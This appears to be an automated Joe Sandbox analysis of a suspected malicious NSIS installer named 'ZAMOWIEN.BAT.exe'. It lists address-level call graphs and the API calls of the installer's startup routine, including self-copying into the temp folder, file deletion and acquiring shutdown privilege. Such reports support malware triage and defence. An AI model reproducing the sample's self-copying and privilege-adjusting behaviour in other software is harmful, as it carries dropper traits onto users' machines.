5744->5745 5746 40717d 5745->5746 5747 406893 GlobalFree 5745->5747 5748 40689c GlobalAlloc 5745->5748 5749 406913 GlobalAlloc 5745->5749 5750 40690a GlobalFree 5745->5750 5747->5748 5748->5745 5748->5746 5749->5745 5749->5746 5750->5749 5751 40190f 5752 402c41 17 API calls 5751->5752 5753 401916 5752->5753 5754 4058ea MessageBoxIndirectW 5753->5754 5755 40191f 5754->5755 5756 70501000 5759 7050101b 5756->5759 5760 70501516 GlobalFree 5759->5760 5761 70501020 5760->5761 5762 70501024 5761->5762 5763 70501027 GlobalAlloc 5761->5763 5764 7050153d 3 API calls 5762->5764 5763->5762 5765 70501019 5764->5765 5766 70502301 5767 7050236b 5766->5767 5768 70502376 GlobalAlloc 5767->5768 5769 70502395 5767->5769 5768->5767 5770 401491 5771 4052ec 24 API calls 5770->5771 5772 401498 5771->5772 5773 401d14 5774 402c1f 17 API calls 5773->5774 5775 401d1b 5774->5775 5776 402c1f 17 API calls 5775->5776 5777 401d27 GetDlgItem 5776->5777 5778 402592 5777->5778 5786 402598 5787 4025c7 5786->5787 5788 4025ac 5786->5788 5789 4025fb 5787->5789 5790 4025cc 5787->5790 5791 402c1f 17 API calls 5788->5791 5793 402c41 17 API calls 5789->5793 5792 402c41 17 API calls 5790->5792 5796 4025b3 5791->5796 5794 4025d3 WideCharToMultiByte lstrlenA 5792->5794 5795 402602 lstrlenW 5793->5795 5794->5796 5795->5796 5797 40262f 5796->5797 5798 402645 5796->5798 5800 405e5b 5 API calls 5796->5800 5797->5798 5799 405e2c WriteFile 5797->5799 5799->5798 5800->5797 5801 40149e 5802 4022f7 5801->5802 5803 4014ac PostQuitMessage 5801->5803 5803->5802 5804 401c1f 5805 402c1f 17 API calls 5804->5805 5806 401c26 5805->5806 5807 402c1f 17 API calls 5806->5807 5808 401c33 5807->5808 5809 401c48 5808->5809 5810 402c41 17 API calls 5808->5810 5811 401c58 5809->5811 5814 402c41 17 API calls 5809->5814 5810->5809 5812 401c63 5811->5812 5813 401caf 5811->5813 5815 402c1f 17 API calls 5812->5815 5816 402c41 17 API calls 5813->5816 5814->5811 5817 401c68 5815->5817 5818 401cb4 5816->5818 5819 402c1f 17 API calls 5817->5819 5820 402c41 17 API calls 5818->5820 5821 401c74 5819->5821 5822 401cbd FindWindowExW 5820->5822 5823 401c81 SendMessageTimeoutW 5821->5823 5824 401c9f SendMessageW 5821->5824 5825 401cdf 5822->5825 5823->5825 5824->5825 5826 402aa0 SendMessageW 5827 402ac5 5826->5827 5828 402aba InvalidateRect 5826->5828 5828->5827 5829 402821 5830 402827 5829->5830 5831 402ac5 5830->5831 5832 40282f FindClose 5830->5832 5832->5831 4382 403d22 4383 403e75 4382->4383 4384 403d3a 4382->4384 4386 403ec6 4383->4386 4387 403e86 GetDlgItem GetDlgItem 4383->4387 4384->4383 4385 403d46 4384->4385 4388 403d51 SetWindowPos 4385->4388 4389 403d64 4385->4389 4391 403f20 4386->4391 4399 401389 2 API calls 4386->4399 4390 4041fb 18 API calls 4387->4390 4388->4389 4392 403d81 4389->4392 4393 403d69 ShowWindow 4389->4393 4394 403eb0 SetClassLongW 4390->4394 4400 403e70 4391->4400 4453 404247 4391->4453 4396 403da3 4392->4396 4397 403d89 DestroyWindow 4392->4397 4393->4392 4398 40140b 2 API calls 4394->4398 4402 403da8 SetWindowLongW 4396->4402 4403 403db9 4396->4403 4401 404184 4397->4401 4398->4386 4404 403ef8 4399->4404 4401->4400 4410 4041b5 ShowWindow 4401->4410 4402->4400 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4391 4409 403efc SendMessageW 4404->4409 4405 40140b 2 API calls 4423 403f32 4405->4423 4406 404186 DestroyWindow EndDialog 4406->4401 4475 404262 4407->4475 4411 403df5 4408->4411 4412 403dd8 SendMessageW IsWindowEnabled 4408->4412 4409->4400 4410->4400 4415 403e02 4411->4415 4416 403e15 4411->4416 4417 403e49 SendMessageW 4411->4417 4426 403dfa 4411->4426 4412->4400 4412->4411 4414 4062a6 17 API calls 4414->4423 4415->4417 4415->4426 4420 403e32 4416->4420 4421 403e1d 4416->4421 4417->4407 4419 4041fb 18 API calls 4419->4423 4425 40140b 2 API calls 4420->4425 4469 40140b 4421->4469 4422 403e30 4422->4407 4423->4400 4423->4405 4423->4406 4423->4414 4423->4419 4444 4040c6 DestroyWindow 4423->4444 4456 4041fb 4423->4456 4427 403e39 4425->4427 4472 4041d4 4426->4472 4427->4407 4427->4426 4429 403fad GetDlgItem 4430 403fc2 4429->4430 4431 403fca ShowWindow KiUserCallbackDispatcher 4429->4431 4430->4431 4459 40421d KiUserCallbackDispatcher 4431->4459 4433 403ff4 EnableWindow 4438 404008 4433->4438 4434 40400d GetSystemMenu EnableMenuItem SendMessageW 4435 40403d SendMessageW 4434->4435 4434->4438 4435->4438 4438->4434 4460 404230 SendMessageW 4438->4460 4461 403d03 4438->4461 4464 406284 lstrcpynW 4438->4464 4440 40406c lstrlenW 4441 4062a6 17 API calls 4440->4441 4442 404082 SetWindowTextW 4441->4442 4465 401389 4442->4465 4444->4401 4445 4040e0 CreateDialogParamW 4444->4445 4445->4401 4446 404113 4445->4446 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4400 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4401 4454 404250 SendMessageW 4453->4454 4455 40425f 4453->4455 4454->4455 4455->4423 4457 4062a6 17 API calls 4456->4457 4458 404206 SetDlgItemTextW 4457->4458 4458->4429 4459->4433 4460->4438 4462 4062a6 17 API calls 4461->4462 4463 403d11 SetWindowTextW 4462->4463 4463->4438 4464->4440 4467 401390 4465->4467 4466 4013fe 4466->4423 4467->4466 4468 4013cb MulDiv SendMessageW 4467->4468 4468->4467 4470 401389 2 API calls 4469->4470 4471 401420 4470->4471 4471->4426 4473 4041e1 SendMessageW 4472->4473 4474 4041db 4472->4474 4473->4422 4474->4473 4476 40427a GetWindowLongW 4475->4476 4477 404325 4475->4477 4476->4477 4478 40428f 4476->4478 4477->4400 4478->4477 4479 4042bc GetSysColor 4478->4479 4480 4042bf 4478->4480 4479->4480 4481 4042c5 SetTextColor 4480->4481 4482 4042cf SetBkMode 4480->4482 4481->4482 4483 4042e7 GetSysColor 4482->4483 4484 4042ed 4482->4484 4483->4484 4485 4042f4 SetBkColor 4484->4485 4486 4042fe 4484->4486 4485->4486 4486->4477 4487 404311 DeleteObject 4486->4487 4488 404318 CreateBrushIndirect 4486->4488 4487->4488 4488->4477 5833 4015a3 5834 402c41 17 API calls 5833->5834 5835 4015aa SetFileAttributesW 5834->5835 5836 4015bc 5835->5836 5837 4046a5 5838 4046b5 5837->5838 5839 4046db 5837->5839 5841 4041fb 18 API calls 5838->5841 5840 404262 8 API calls 5839->5840 5843 4046e7 5840->5843 5842 4046c2 SetDlgItemTextW 5841->5842 5842->5839 5844 4029a8 5845 402c1f 17 API calls 5844->5845 5846 4029ae 5845->5846 5847 4029d5 5846->5847 5848 4029ee 5846->5848 5855 40288b 5846->5855 5849 4029da 5847->5849 5850 4029eb 5847->5850 5851 402a08 5848->5851 5852 4029f8 5848->5852 5858 406284 lstrcpynW 5849->5858 5850->5855 5859 4061cb wsprintfW 5850->5859 5854 4062a6 17 API calls 5851->5854 5853 402c1f 17 API calls 5852->5853 5853->5850 5854->5850 5858->5855 5859->5855 4601 40542b 4602 4055d5 4601->4602 4603 40544c GetDlgItem GetDlgItem GetDlgItem 4601->4603 4605 405606 4602->4605 4606 4055de GetDlgItem CreateThread CloseHandle 4602->4606 4647 404230 SendMessageW 4603->4647 4607 405631 4605->4607 4609 405656 4605->4609 4610 40561d ShowWindow ShowWindow 4605->4610 4606->4605 4650 4053bf OleInitialize 4606->4650 4611 405691 4607->4611 4612 40563d 4607->4612 4608 4054bc 4617 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4608->4617 4616 404262 8 API calls 4609->4616 4649 404230 SendMessageW 4610->4649 4611->4609 4620 40569f SendMessageW 4611->4620 4614 405645 4612->4614 4615 40566b ShowWindow 4612->4615 4621 4041d4 SendMessageW 4614->4621 4623 40568b 4615->4623 4624 40567d 4615->4624 4622 405664 4616->4622 4618 405531 4617->4618 4619 405515 SendMessageW SendMessageW 4617->4619 4625 405544 4618->4625 4626 405536 SendMessageW 4618->4626 4619->4618 4620->4622 4627 4056b8 CreatePopupMenu 4620->4627 4621->4609 4629 4041d4 SendMessageW 4623->4629 4628 4052ec 24 API calls 4624->4628 4631 4041fb 18 API calls 4625->4631 4626->4625 4630 4062a6 17 API calls 4627->4630 4628->4623 4629->4611 4632 4056c8 AppendMenuW 4630->4632 4633 405554 4631->4633 4634 4056e5 GetWindowRect 4632->4634 4635 4056f8 TrackPopupMenu 4632->4635 4636 405591 GetDlgItem SendMessageW 4633->4636 4637 40555d ShowWindow 4633->4637 4634->4635 4635->4622 4638 405713 4635->4638 4636->4622 4641 4055b8 SendMessageW SendMessageW 4636->4641 4639 405580 4637->4639 4640 405573 ShowWindow 4637->4640 4642 40572f SendMessageW 4638->4642 4648 404230 SendMessageW 4639->4648 4640->4639 4641->4622 4642->4642 4643 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4642->4643 4645 405771 SendMessageW 4643->4645 4645->4645 4646 40579a GlobalUnlock SetClipboardData CloseClipboard 4645->4646 4646->4622 4647->4608 4648->4636 4649->4607 4651 404247 SendMessageW 4650->4651 4652 4053e2 4651->4652 4655 401389 2 API calls 4652->4655 4656 405409 4652->4656 4653 404247 SendMessageW 4654 40541b OleUninitialize 4653->4654 4655->4652 4656->4653 5860 7050103d 5861 7050101b 5 API calls 5860->5861 5862 70501056 5861->5862 5870 4028ad 5871 402c41 17 API calls 5870->5871 5872 4028bb 5871->5872 5873 4028d1 5872->5873 5874 402c41 17 API calls 5872->5874 5875 405d55 2 API calls 5873->5875 5874->5873 5876 4028d7 5875->5876 5898 405d7a GetFileAttributesW CreateFileW 5876->5898 5878 4028e4 5879 4028f0 GlobalAlloc 5878->5879 5880 402987 5878->5880 5881 402909 5879->5881 5882 40297e CloseHandle 5879->5882 5883 4029a2 5880->5883 5884 40298f DeleteFileW 5880->5884 5899 403311 SetFilePointer 5881->5899 5882->5880 5884->5883 5886 40290f 5887 4032fb ReadFile 5886->5887 5888 402918 GlobalAlloc 5887->5888 5889 402928 5888->5889 5890 40295c 5888->5890 5891 403116 35 API calls 5889->5891 5892 405e2c WriteFile 5890->5892 5897 402935 5891->5897 5893 402968 GlobalFree 5892->5893 5894 403116 35 API calls 5893->5894 5896 40297b 5894->5896 5895 402953 GlobalFree 5895->5890 5896->5882 5897->5895 5898->5878 5899->5886 5900 401a30 5901 402c41 17 API calls 5900->5901 5902 401a39 ExpandEnvironmentStringsW 5901->5902 5903 401a4d 5902->5903 5905 401a60 5902->5905 5904 401a52 lstrcmpW 5903->5904 5903->5905 5904->5905 5906 404331 lstrcpynW lstrlenW 4722 402032 4723 402044 4722->4723 4724 4020f6 4722->4724 4725 402c41 17 API calls 4723->4725 4727 401423 24 API calls 4724->4727 4726 40204b 4725->4726 4728 402c41 17 API calls 4726->4728 4733 402250 4727->4733 4729 402054 4728->4729 4730 40206a LoadLibraryExW 4729->4730 4731 40205c GetModuleHandleW 4729->4731 4730->4724 4732 40207b 4730->4732 4731->4730 4731->4732 4745 4066cd WideCharToMultiByte 4732->4745 4736 4020c5 4738 4052ec 24 API calls 4736->4738 4737 40208c 4739 402094 4737->4739 4740 4020ab 4737->4740 4741 40209c 4738->4741 4742 401423 24 API calls 4739->4742 4748 7050177b 4740->4748 4741->4733 4743 4020e8 FreeLibrary 4741->4743 4742->4741 4743->4733 4746 4066f7 GetProcAddress 4745->4746 4747 402086 4745->4747 4746->4747 4747->4736 4747->4737 4749 705017ae 4748->4749 4790 70501b63 4749->4790 4751 705017b5 4752 705018da 4751->4752 4753 705017c6 4751->4753 4754 705017cd 4751->4754 4752->4741 4838 70502356 4753->4838 4822 70502398 4754->4822 4759 70501831 4765 70501882 4759->4765 4766 70501837 4759->4766 4760 70501813 4851 7050256d 4760->4851 4761 705017e3 4764 705017e9 4761->4764 4771 705017f4 4761->4771 4762 705017fc 4775 705017f2 4762->4775 4848 70502d2f 4762->4848 4764->4775 4832 70502a74 4764->4832 4769 7050256d 10 API calls 4765->4769 4870 705015c6 4766->4870 4780 70501873 4769->4780 4770 70501819 4862 705015b4 4770->4862 4842 70502728 4771->4842 4775->4759 4775->4760 4777 705017fa 4777->4775 4778 7050256d 10 API calls 4778->4780 4781 705018c9 4780->4781 4877 70502530 4780->4877 4781->4752 4783 705018d3 GlobalFree 4781->4783 4783->4752 4787 705018b5 4787->4781 4881 7050153d wsprintfW 4787->4881 4789 705018ae FreeLibrary 4789->4787 4884 7050121b GlobalAlloc 4790->4884 4792 70501b87 4885 7050121b GlobalAlloc 4792->4885 4794 70501dad GlobalFree GlobalFree GlobalFree 4795 70501dca 4794->4795 4813 70501e14 4794->4813 4796 70502196 4795->4796 4804 70501ddf 4795->4804 4795->4813 4799 705021b8 GetModuleHandleW 4796->4799 4796->4813 4797 70501c68 GlobalAlloc 4798 70501b92 4797->4798 4798->4794 4798->4797 4800 70501cd1 GlobalFree 4798->4800 4803 70501cb3 lstrcpyW 4798->4803 4806 70501cbd lstrcpyW 4798->4806 4808 705020f0 4798->4808 4812 70502068 4798->4812 4798->4813 4817 70501fa9 GlobalFree 4798->4817 4818 7050122c 2 API calls 4798->4818 4886 7050158f GlobalSize GlobalAlloc 4798->4886 4801 705021c9 LoadLibraryW 4799->4801 4802 705021de 4799->4802 4800->4798 4801->4802 4801->4813 4892 70501621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4802->4892 4803->4806 4804->4813 4888 7050122c 4804->4888 4806->4798 4807 70502230 4811 7050223d lstrlenW 4807->4811 4807->4813 4808->4813 4816 70502138 lstrcpyW 4808->4816 4810 705021f0 4810->4807 4820 7050221a GetProcAddress 4810->4820 4893 70501621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4811->4893 4891 7050121b GlobalAlloc 4812->4891 4813->4751 4816->4813 4817->4798 4818->4798 4820->4807 4821 70502071 4821->4751 4824 705023b0 4822->4824 4823 7050122c GlobalAlloc lstrcpynW 4823->4824 4824->4823 4826 705024d9 GlobalFree 4824->4826 4827 70502483 GlobalAlloc CLSIDFromString 4824->4827 4828 70502458 GlobalAlloc WideCharToMultiByte 4824->4828 4831 705024a2 4824->4831 4895 705012ba 4824->4895 4826->4824 4829 705017d3 4826->4829 4827->4826 4828->4826 4829->4761 4829->4762 4829->4775 4831->4826 4899 705026bc 4831->4899 4834 70502a86 4832->4834 4833 70502b2b CreateFileA 4835 70502b49 4833->4835 4834->4833 4836 70502c45 4835->4836 4837 70502c3a GetLastError 4835->4837 4836->4775 4837->4836 4839 7050236b 4838->4839 4840 70502376 GlobalAlloc 4839->4840 4841 705017cc 4839->4841 4840->4839 4841->4754 4846 70502758 4842->4846 4843 705027f3 GlobalAlloc 4847 70502816 4843->4847 4844 70502806 4845 7050280c GlobalSize 4844->4845 4844->4847 4845->4847 4846->4843 4846->4844 4847->4777 4849 70502d3a 4848->4849 4850 70502d7a GlobalFree 4849->4850 4902 7050121b GlobalAlloc 4851->4902 4853 705025f0 MultiByteToWideChar 4858 70502577 4853->4858 4854 70502612 StringFromGUID2 4854->4858 4855 70502623 lstrcpynW 4855->4858 4856 70502636 wsprintfW 4856->4858 4857 7050265a GlobalFree 4857->4858 4858->4853 4858->4854 4858->4855 4858->4856 4858->4857 4859 7050268f GlobalFree 4858->4859 4860 70501272 2 API calls 4858->4860 4903 705012e1 4858->4903 4859->4770 4860->4858 4907 7050121b GlobalAlloc 4862->4907 4864 705015b9 4865 705015c6 2 API calls 4864->4865 4866 705015c3 4865->4866 4867 70501272 4866->4867 4868 705012b5 GlobalFree 4867->4868 4869 7050127b GlobalAlloc lstrcpynW 4867->4869 4868->4780 4869->4868 4871 705015e4 4870->4871 4872 705015d6 lstrcpyW 4870->4872 4871->4872 4874 705015f0 4871->4874 4875 7050161d 4872->4875 4874->4875 4876 7050160d wsprintfW 4874->4876 4875->4778 4876->4875 4878 7050253e 4877->4878 4880 70501895 4877->4880 4879 7050255a GlobalFree 4878->4879 4878->4880 4879->4878 4880->4787 4880->4789 4882 70501272 2 API calls 4881->4882 4883 7050155e 4882->4883 4883->4781 4884->4792 4885->4798 4887 705015ad 4886->4887 4887->4798 4894 7050121b GlobalAlloc 4888->4894 4890 7050123b lstrcpynW 4890->4813 4891->4821 4892->4810 4893->4813 4894->4890 4896 705012c1 4895->4896 4897 7050122c 2 API calls 4896->4897 4898 705012df 4897->4898 4898->4824 4900 70502720 4899->4900 4901 705026ca VirtualAlloc 4899->4901 4900->4831 4901->4900 4902->4858 4904 705012ea 4903->4904 4905 7050130c 4903->4905 4904->4905 4906 705012f0 lstrcpyW 4904->4906 4905->4858 4906->4905 4907->4864 5907 403932 5908 40393d 5907->5908 5909 403944 GlobalAlloc 5908->5909 5910 403941 5908->5910 5909->5910 5916 402a35 5917 402c1f 17 API calls 5916->5917 5918 402a3b 5917->5918 5919 402a72 5918->5919 5921 40288b 5918->5921 5922 402a4d 5918->5922 5920 4062a6 17 API calls 5919->5920 5919->5921 5920->5921 5922->5921 5924 4061cb wsprintfW 5922->5924 5924->5921 5925 401735 5926 402c41 17 API calls 5925->5926 5927 40173c SearchPathW 5926->5927 5928 401757 5927->5928 5929 4029e6 5927->5929 5928->5929 5931 406284 lstrcpynW 5928->5931 5931->5929 5932 4014b8 5933 4014be 5932->5933 5934 401389 2 API calls 5933->5934 5935 4014c6 5934->5935 5936 401db9 GetDC 5937 402c1f 17 API calls 5936->5937 5938 401dcb GetDeviceCaps MulDiv ReleaseDC 5937->5938 5939 402c1f 17 API calls 5938->5939 5940 401dfc 5939->5940 5941 4062a6 17 API calls 5940->5941 5942 401e39 CreateFontIndirectW 5941->5942 5943 402592 5942->5943 5944 4043ba 5945 4043d2 5944->5945 5946 4044ec 5944->5946 5949 4041fb 18 API calls 5945->5949 5947 404556 5946->5947 5950 404620 5946->5950 5955 404527 GetDlgItem SendMessageW 5946->5955 5948 404560 GetDlgItem 5947->5948 5947->5950 5951 4045e1 5948->5951 5952 40457a 5948->5952 5953 404439 5949->5953 5954 404262 8 API calls 5950->5954 5951->5950 5959 4045f3 5951->5959 5952->5951 5958 4045a0 SendMessageW LoadCursorW SetCursor 5952->5958 5956 4041fb 18 API calls 5953->5956 5957 40461b 5954->5957 5977 40421d KiUserCallbackDispatcher 5955->5977 5962 404446 CheckDlgButton 5956->5962 5978 404669 5958->5978 5964 404609 5959->5964 5965 4045f9 SendMessageW 5959->5965 5961 404551 5966 404645 SendMessageW 5961->5966 5975 40421d KiUserCallbackDispatcher 5962->5975 5964->5957 5969 40460f SendMessageW 5964->5969 5965->5964 5966->5947 5969->5957 5970 404464 GetDlgItem 5976 404230 SendMessageW 5970->5976 5972 40447a SendMessageW 5973 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5972->5973 5974 404497 GetSysColor 5972->5974 5973->5957 5974->5973 5975->5970 5976->5972 5977->5961 5981 4058b0 ShellExecuteExW 5978->5981 5980 4045cf LoadCursorW SetCursor 5980->5951 5981->5980 5982 40283b 5983 402843 5982->5983 5984 402847 FindNextFileW 5983->5984 5985 402859 5983->5985 5984->5985 5986 4029e6 5985->5986 5988 406284 lstrcpynW 5985->5988 5988->5986

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 30 403482-403487 28->30 31 403489-40348d 28->31 36 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->36 37 4035fd-403617 DeleteFileW call 402edd 29->37 30->30 30->31 33 403494-403498 31->33 34 40348f-403493 31->34 38 403557-403564 call 405b86 33->38 39 40349e-4034a4 33->39 34->33 36->37 52 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 36->52 56 4036c8-4036d8 call 40389a OleUninitialize 37->56 57 40361d-403623 37->57 54 403566-403567 38->54 55 403568-40356e 38->55 43 4034a6-4034ae 39->43 44 4034bf-4034f8 39->44 48 4034b0-4034b3 43->48 49 4034b5 43->49 50 403515-40354f 44->50 51 4034fa-4034ff 44->51 48->44 48->49 49->44 50->38 53 403551-403555 50->53 51->50 58 403501-403509 51->58 52->37 52->56 53->38 62 403576-403584 call 406284 53->62 54->55 55->28 63 403574 55->63 73 4037fe-403804 56->73 74 4036de-4036ee call 4058ea ExitProcess 56->74 64 4036b8-4036bf call 403974 57->64 65 403629-403634 call 405b86 57->65 59 403510 58->59 60 40350b-40350e 58->60 59->50 60->50 60->59 69 403589 62->69 63->69 76 4036c4 64->76 80 403682-40368c 65->80 81 403636-40366b 65->81 69->29 78 403882-40388a 73->78 79 403806-40381c GetCurrentProcess OpenProcessToken 73->79 76->56 82 403890-403894 ExitProcess 78->82 83 40388c 78->83 87 403852-403860 call 40665e 79->87 88 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 79->88 85 4036f4-403708 call 405855 lstrcatW 80->85 86 40368e-40369c call 405c61 80->86 89 40366d-403671 81->89 83->82 100 403715-40372f lstrcatW lstrcmpiW 85->100 101 40370a-403710 lstrcatW 85->101 86->56 99 40369e-4036b4 call 406284 * 2 86->99 102 403862-40386c 87->102 103 40386e-403879 ExitWindowsEx 87->103 88->87 93 403673-403678 89->93 94 40367a-40367e 89->94 93->94 95 403680 93->95 94->89 94->95 95->80 99->64 100->56 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->78 103->106 109 403736-40373b call 4057bb 105->109 110 40373d call 405838 105->110 106->78 117 403742-403750 SetCurrentDirectoryW 109->117 110->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 128 4037f2-4037f9 call 40604a 126->128 127->126 129 4037bb-4037db call 40604a call 4062a6 call 40586d 127->129 128->56 129->126 138 4037dd-4037e4 CloseHandle 129->138 138->126
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000020,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00420EA8,?,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
